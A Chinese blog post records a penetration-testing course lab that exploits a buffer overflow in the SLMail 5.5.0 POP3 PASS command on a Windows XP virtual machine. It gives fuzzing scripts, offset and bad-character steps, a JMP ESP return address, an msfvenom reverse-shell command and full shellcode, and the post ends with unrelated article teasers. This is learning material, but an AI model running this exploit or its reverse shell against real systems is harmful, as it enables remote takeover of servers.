技术标签: 渗透测试
跟着苑房弘老师的kali linux渗透测试课程做的实验,记录学习过程。
虚拟机:
安装在靶机上的工具:
immunity debugger
https://www.immunityinc.com/products/debugger/
SLMail 5.5.0 Mail Server
http://slmail.software.informer.com/5.5/
将Win XP上的防火墙手动关闭。
将 slmail 在Win XP上安装配置好。
可以通过win+r -> cmd -> netstat -nao
查看端口,25、110、180都处于LISTENING模式。
win+r -> services.msc
可以看到三个服务项处于启动状态。如果没有启动,则手动点击启动。
安装immunity debugger
安装好后将mona.py移动到immunity debugger所在文件目录下的PyCommands文件夹里。
测试靶机端口是否开放
在kali中使用nc查看XP机器的25、110端口,成功连接如下图:
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print("\nSending evil buffer...")
s.connect(('172.16.2.202',110))
data=s.recv(1024)
print data
s.send('USER IEUser'+'\r\n')
data=s.recv(1024)
print data
s.send('PASS test\r\n')
data=s.recv(1024)
print data
s.close()
print("\nDone!")
except:
print ("Cloud not connect to POP3")
#!/usr/bin/python
import socket
buffer=["A"]
counter=100
while len(buffer) <=30:
buffer.append("B"*counter)
counter=counter+200
for string in buffer:
print ("Fuzzing PASS with %s bytes" % len(string))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('172.16.2.202',110))
s.recv(1024)
s.send('USER test'+'\r\n')
s.recv(1024)
s.send('PASS '+ string + '\r\n')
s.send('QUIT\r\n')
s.close()
调试工具immunity debugger侦听110端口服务在当前系统中运行的情况:
注意事项:目标机每一次被处于Paused状态后需要将调试工具immunity debugger关闭,然后在服务中重启POP3 server服务,再次打开immunity debugger去attach110端口。
在kali中执行02.py向客户端发送大量数据进行模糊测试:
发到2900时很久都没有动静
到XP中查看,发现向目标机器发送了大量的“A”导致了目标进程的崩溃。
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer='A'*2600
try:
print("\nSending evil buffer...")
s.connect(('172.16.2.202',110))
data=s.recv(1024)
s.send('USER test'+'\r\n')
data=s.recv(1024)
s.send('PASS '+ buffer + '\r\n')
print("\nDone!.")
except:
print("Could not connect to POP3!")
而要利用缓冲区溢出拿到目标系统的管理权实现对目标机的控制需要足够多的数据覆盖EIP,而覆盖内容是我们可以定制去修改的。现在可以确定EIP寄存器的位置位于2600-2700,如何才能精确修改数值?
二分法
唯一字串法
kali中有现成脚本生成一个2700位的唯一字符串,将该字符串放入04.py中。
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer='Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9'
try:
print("\nSending evil buffer...")
s.connect(('172.16.2.202',110))
data = s.recv(1024)
s.send('USER test'+'\r\n')
data = s.recv(1024)
s.send('PASS '+buffer + '\r\n')
print("\nDone!")
except:
print("Could not connect to POP3!")
./pattern_offset.rb -q 39694438
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer="A"*2606+"B"*4+"C"*20
try:
print("\nSending evil buffer...")
s.connect(('172.16.2.202',110))
data = s.recv(1024)
s.send('USER test'+'\r\n')
data = s.recv(1024)
s.send('PASS '+buffer + '\r\n')
print("\nDone!")
except:
print("Could not connect to POP3!")
执行05.py
查看XP的寄存器状态,发现EIP中是4个"B”,ESP中是20个"C"
可以看到2606A+4B+20*C,可以精确修改EIP内容了。
EIP中存放的数据是下一条指令内存地址的地址。
将EIP指向shellcode所存放的内存地址空间,则可实现对服务器的远程控制
思路:将EIP修改为shellcode代码的内存地址,将shellcode写入到该地址空间,程序读取EIP寄存器数值,将跳转到shellcode代码段并执行。
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer="A"*2606+"B"*4+"C"*(3500-2606-4)
try:
print("\nSending evil buffer...")
s.connect(('172.16.2.202',110))
data = s.recv(1024)
s.send('USER test'+'\r\n')
data = s.recv(1024)
s.send('PASS '+buffer + '\r\n')
print("\nDone!")
except:
print("Could not connect to POP3!")
不同类型的程序、协议、漏洞,会将某些字符认为是坏字符,这些坏字符有固定的用途
返回地址、shellcode、buffer中都不能出现坏字符
思路:发送 0x00-0xff 256个字符查找所有换字符
原理:计算机使用ASCII编码,1个字符由1个字节表示,1个字节是8个二进制数0000 0000,所以 0000 0000 - 1111 1111 有二进制组合256种,一次性将256个字符打入ESP看哪部分会被过滤。
将256个字符作为变量赋给badchars
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x00")
buffer="A"*2606+"B"*4+ badchars
try:
print("\nSending evil buffer...")
s.connect(('172.16.2.202',110))
data = s.recv(1024)
s.send('USER test'+'\r\n')
data = s.recv(1024)
s.send('PASS '+buffer + '\r\n')
print("\nDone!")
except:
print("Could not connect to POP3!")
查找出三个坏字符:0a、00、0d
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer="A"*2606+ "\xe3\x41\x4b\x5f" + "C" * 390
try:
print("\nSending evil buffer...")
s.connect(('172.16.2.202',110))
data = s.recv(1024)
s.send('USER test'+'\r\n')
data = s.recv(1024)
s.send('PASS '+buffer + '\r\n')
print("\nDone!'")
except:
print("Could not connect to POP3!")
将EIP寄存器中的4个字节改为ESP的地址
a) 但是ESP地址在变化,每次有可能一样也有可能不一样,硬编码不可行。
b) SLMail线程应用程序,操作系统为每个线程分配一段地址范围,每个线程地址范围不确定。
变通思路
a) 在内存中寻找地址固定的系统模块
b) 在模块中寻找JMP ESP指令的地址跳转,再由该指令间接跳转到ESP,从而执行shellcode
c) mona.py脚本识别内存模块,搜索“return address”是JMP ESP指令的模块。
d) 寻找无DEP、ALSR保护的内存地址
e) 内存地址不包含坏字符
在kali中使用nasm_shell工具得到汇编指令“JMP ESP”的二进制表示FFE4
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
在调试工具 Immunity Debugger中输入!mona modules
查找所有模块.
选择Rebase、SafeSEH、ASLR、NXCompat都是False,OS Dll是True的模块。
在该模块中搜索“JMP ESP”,!mona find -s"\xff\e4" -m openc32.dll
结果显示没有,那就换一个模块。
查到slmfc.dll模块是显示19个结果。
选中一个,双击。右键数据模块选择汇编语言显示。
点击上面菜单栏m,打开地图。
打断点 验证发送溢出程序时,是否真正实现跳转
此时JMP ESP的地址为 5F4B41E3,这个地址就是我们需要的不变的地址。将其放入08.py脚本中。
执行08.py
XP中进程在断点处停止,EIP中已经被正确的指定地址 SLMFC.dll中的JMP ESP指令
按下F7单步向前执行,程序跳转到01F7A154 地址,这是ESP的地址,ESP地址中存的都是C
到这里已经实现了对EIP内容的修改,修改后实现跳转,跳转后又回到ESP寄存器。下一步需要在ESP寄存器中真正存入shellcode,执行,获得权限,然后真正控制目标机器。
这里我没能复现成功获得权限,苑老师用msfpayload win32_reverse 生成一个反弹shell权限的shellcode,用nc 监听端口,然后发到ESP中,获得权限。但是我用的kali版本中的msfpayload中没有 win32_reverse,我用了windows/shell/reverse_tcp,成功的和目标机的某个端口建立通信。
-cd /usr/share/metasploit-framework
进入目录
msfvenom -l payloads
查看所有shellcode
msfvenom -p windows/shell/reverse_tcp EXITFUNC=thread LHOST=172.16.2.63 LPORT=12388 -f c -a x86 --platform win -b "\x00\x0a\x0d"
-p 使用windows/shell/reverse_tcp;EXITFUNC=thread 实现重复溢出,避免整个服务崩溃;LHOST=172.16.2.63 LPORT=12388 设置反弹到本机IP和端口
-b 排除前面已经知道的坏字符
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# buffer="A"*2606+ "\xe3\x41\x4b\x5f" + "C" * 390
shellcode = (
"\xdb\xcb\xbe\x95\xa7\x04\x1c\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"+
"\x5e\x83\xc5\x04\x31\x75\x16\x03\x75\x16\xe2\x60\x5b\xec\x93"+
"\x8a\xa4\xed\xcb\x03\x41\xdc\xd9\x77\x01\x4d\xee\xfc\x47\x7e"+
"\x85\x50\x7c\x71\x2e\x1e\x5a\xbc\xaf\x15\xd0\x96\x7e\xe9\xb9"+
"\xdb\xe1\x95\xc3\x0f\xc2\xa4\x0b\x42\x03\xe1\xdd\x28\xec\xbf"+
"\x56\x80\xe2\x68\xe2\x67\x3f\x97\x24\xec\x7f\xef\x41\x33\x0b"+
"\x43\x4b\x64\x7f\x03\x6b\x85\x53\x38\x23\x9d\x03\xbb\x7d\xe9"+
"\x9f\x8a\x4c\xed\x6b\x38\x24\x10\xba\x71\xfa\xd2\x8d\x7c\x56"+
"\xd5\xd6\x46\x46\xa3\x2c\xb5\xfb\xb4\xf6\xc4\x27\x30\xe9\x6e"+
"\xa3\xe2\xcd\x8f\x60\x74\x85\x83\xcd\xf2\xc1\x87\xd0\xd7\x79"+
"\xb3\x59\xd6\xad\x32\x19\xfd\x69\x1f\xf9\x9c\x28\xc5\xac\xa1"+
"\x2b\xa1\x11\x04\x27\x43\x47\x38\xc8\x9c\x68\x64\x5f\x51\xa5"+
"\x97\x9f\xfd\xbe\xe4\xad\xa2\x14\x63\x9e\x2b\xb3\x74\x97\x3b"+
"\x44\xaa\x1f\x2b\xba\x4b\x60\x62\x79\x1f\x30\x1c\xa8\x20\xdb"+
"\xdc\x55\xf5\x76\xd6\xc1\x5a\x96\xe4\x2e\xcb\x95\xe8\x60\x6f"+
"\x13\x0e\xd0\x3f\x73\x9e\x91\xef\x33\x4e\x7a\xfa\xbb\xb1\x9a"+
"\x05\x16\xda\x31\xea\xcf\xb3\xad\x93\x55\x4f\x4f\x5b\x40\x2a"+
"\x4f\xd7\x61\xcb\x1e\x10\x03\xdf\x77\x47\xeb\x1f\x88\xe2\xeb"+
"\x75\x8c\xa4\xbc\xe1\x8e\x91\x8b\xae\x71\xf4\x8f\xa8\x8e\x89"+
"\xb9\xc3\xb9\x1f\x86\xbb\xc5\xcf\x06\x3b\x90\x85\x06\x53\x44"+
"\xfe\x54\x46\x8b\x2b\xc9\xdb\x1e\xd4\xb8\x88\x89\xbc\x46\xf7"+
"\xfe\x62\xb8\xd2\x7c\x64\x46\xa1\xaa\xcd\x2f\x59\xeb\xed\xaf"+
"\x33\xeb\xbd\xc7\xc8\xc4\x32\x28\x31\xcf\x1a\x20\xb8\x9e\xe9"+
"\xd1\xbd\x8a\xac\x4f\xbe\x39\x75\x7f\xc5\x32\x8a\x80\x3a\x5b"+
"\xef\x80\x3b\x63\x11\xbc\xea\x5a\x67\x83\x2f\xd9\x68\x1e\x85"+
"\x14\x01\x87\x4c\x95\x4c\x38\xbb\xda\x68\xbb\x49\xa3\x8e\xa3"+
"\x38\xa6\xcb\x63\xd1\xda\x44\x06\xd5\x49\x64\x03")
buffer="A"*2606+ "\xe3\x41\x4b\x5f" + "\x90"*8 + shellcode
try:
print("\nSending evil buffer...")
s.connect(('172.16.2.202',110))
data = s.recv(1024)
s.send('USER test'+'\r\n')
data = s.recv(1024)
s.send('PASS '+buffer + '\r\n')
print("\nDone!")
except:
print("Could not connect to POP3!")
使用nc监听刚才设置的端口 nc -vlp 12388
执行09.py
显示成功连接到目标机172.16.2.202 1280端口
netstat -nao
能查看到目前1280端口状态 ESTABLISHED我的复现到这里就结束了
end
文章浏览阅读748次。总结起来大概有5种做法:将要处理的文字写到一个资源文件,如string.xml(使用html用法格式化)当文字中出现URL、E-mail、电话号码等的时候,可以将TextView的android:autoLink属性设置为相应的的值,如果是所有的类型都出来就是**android:autoLink="all",当然也可以在java代码里 做,textView01.setAutoLinkMask(Li..._qaction::settext 无法添加下划线
文章浏览阅读6.3k次,点赞2次,收藏10次。摘要: 背景 随着近几年物联网的发展,时序数据迎来了一个不小的爆发。从DB-Engines上近两年的数据库类型增长趋势来看,时序数据库的增长是非常迅猛的。在去年我花了比较长的时间去了解了一些开源时序数据库,写了一个系列的文章(综述、HBase系、Cassandra系、InfluxDB、Prometheus),感兴趣的可以浏览。背景随着近几年物联网的发展,时序数据迎来了一个不小的爆发。从DB..._tablestore 时间类型处理
文章浏览阅读5.7k次,点赞8次,收藏49次。可以编译成功但是运行时段错误查找原因应该是ROS noetic版本中自带的OpenCV4和VINS-mono中需要使用的OpenCV3冲突的问题。为了便于查找问题,我只先编译feature_tracker包。解决思路历程:o想着把OpenCV4相关的库移除掉,但是发现编译feature_tracker的时候仍然会关联到Opencv4的库,查找原因是因为cv_bridge是依赖opencv4的,这样导致同时使用了opencv3和opencv4,因此运行出现段错误。oo进一步想着(1)把vins-mon_uabntu20.04安装vins-mono
文章浏览阅读3.6k次,点赞3次,收藏12次。创龙TL6748开发板中,EMIFA模块使用默认的PLL0_SYSCLK3时钟,使用AISgen for D800K008工具加载C6748配置文件C6748AISgen_456M_config(Configuration files,在TL_TMS6748/images文件夹下),由图可以看到DIV3等于4,注意这里的DIV3就是实际的分频值(x),而不是写入相应PLL寄存器的值(x-1)。_tms 6748
文章浏览阅读5.9k次,点赞4次,收藏13次。转载请说明出处:eigen稀疏矩阵拼接(块操作)eigen稀疏矩阵拼接(块操作)关于稀疏矩阵的块操作:参考官方链接 However, for performance reasons, writing to a sub-sparse-matrix is much more limited, and currently only contiguous sets of columns..._稀疏矩阵拼接
文章浏览阅读946次,点赞19次,收藏19次。波束形成是天线阵列信号处理中的一项关键技术,它通过对来自不同方向的信号进行加权求和,来增强特定方向的信号并抑制其他方向的干扰。本文介绍了两种基于 Capon 和信号子空间的变形算法,即最小方差无失真响应 (MVDR) 算法和最小范数算法,用于实现波束形成。这些算法通过优化波束形成权重向量,来最小化波束形成输出的方差或范数,从而提高波束形成性能。引言波束形成在雷达、声纳、通信和医学成像等众多应用中至关重要。它可以增强目标信号,抑制干扰和噪声,提高系统性能。
文章浏览阅读3.4w次。转自:http://www.linuxidc.com/Linux/2017-07/145335.htm使用Ubuntu开发已经有些时间了。写下这篇文章,希望记录下这一年的小小总结。使用Linux开发有很多坑,同时也有很多有趣的东西,可以编写一些自动化脚本,添加定时器,例如下班定时关机等自动化脚本,同时对于服务器不太了解的朋友,建议也可以拿台Linux来实践下,同时Ubuntu在Androi_ubuntu开发推荐软件
文章浏览阅读2.2k次。一,问题 nginx反向代理后,在应用中取得的ip都是反向代理服务器的ip,取得的域名也是反向代理配置的url的域名,解决该问题,需要在nginx反向代理配置中添加一些配置信息,目的将客户端的真实ip和域名传递到应用程序中。二,解决 Nginx服务器增加转发配置 proxy_set_header Host $host;_nginx获取到的是交换机的ip
文章浏览阅读1.4k次。Wireshark TCP数据包跟踪 还原图片 WinHex简单应用 _wireshark抓包还原图片
文章浏览阅读1.5k次。Win8下安装VS2012时,蓝屏,报错WHEA_UNCORRECTABLE_ERROR(P.S.新的BSOD挺有创意":("),Google之,发现[via]需要BIOS中禁用Intel C-State,有严重Bug的嫌疑哦原因有空再看看..._win8.1 whea_uncorrectable_error蓝屏代码
文章浏览阅读919次,点赞21次,收藏22次。科大讯飞是一家专业从事智能语音及语音技术研究、软件及芯片产品开发、语音信息服务的软件企业,语音技术实现了人机语音交互,使人与机器之间沟通变得像人与人沟通一样简单。语音技术主要包括语音合成和语音识别两项关键技术。此外,语音技术还包括语音编码、音色转换、口语评测、语音消噪和增强等技术,有着广阔的应用。_科大讯飞培训案例
文章浏览阅读4.7k次。Perl是一个高阶程式语言,由 Larry Wall和其他许多人所写,融合了许多语言的特性。它主要是由无所不在的 C语言,其次由 sed、awk,UNIX shell 和至少十数种其他的工具和语言所演化而来。Perl对 process、档案,和文字有很强的处理、变换能力,ActivePerl是一个perl脚本解释器。其包含了包括有 Perl for Win32、Perl for ISAPI、PerlScript、Perl。_perl下载